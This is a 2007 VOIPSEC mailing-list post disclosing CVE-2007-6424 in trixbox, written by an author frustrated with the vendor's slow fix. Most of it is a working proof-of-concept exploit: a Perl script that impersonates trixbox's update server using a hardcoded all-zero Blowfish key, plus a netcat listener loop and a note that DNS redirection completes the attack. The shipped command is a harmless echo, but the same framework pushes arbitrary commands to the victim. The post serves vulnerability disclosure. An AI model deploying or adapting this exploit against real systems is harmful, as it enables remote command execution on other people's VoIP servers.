[VOIPSEC] trixbox vuln (CVE-2007-6424) - PoC exploit code
Than Taro
thanrantaro at live.com
Tue Dec 18 22:25:46 EST 2007
Since Fonality has been incredibly slow in dealing with this (it was
reported publicly on Saturday, and they don't expect to have a fix
until at least Friday), I decided to take it upon myself to get a CVE,
and also
write some exploit code. I feel that 72+ hours is more than enough
time to fix something this simple. They also do not appear to have any
intentions of posting an advisory.
Run this in a simple script such as `while :; do netcat -l -p 80 -c
"perl trixbox-exploit.pl"; done`, and then a trivial DNS redirection
can take it from there.
trixbox:~$ cat trixbox-exploit.pl
#!/usr/bin/perl
use strict;
use Crypt::CBC;
my $cipher = Crypt::CBC->new( -cipher => "Blowfish", -key => "00000000000000000000000000000000" );
my $req = <STDIN>;
chomp $req;
my $hax;
if( $req =~ /ce00000000000000000000000000000000/ )
{
$hax = $cipher->encrypt( "1\nce00000000000000000000000000000000\necho Exploited" );
}
elsif( $req =~ /generate_id/ )
{
$hax = "ce00000000000000000000000000000000\n00000000000000000000000000000000";
}
else
{
$hax = "ERROR: invalid server id";
}
print "$hax";
trixbox:~$
_________________________________________________________________
Share life as it happens with the new Windows Live.
http://www.windowslive.com/share.html?ocid=TXT_TAGHM_Wave2_sharelife_122007
More information about the Voipsec
mailing list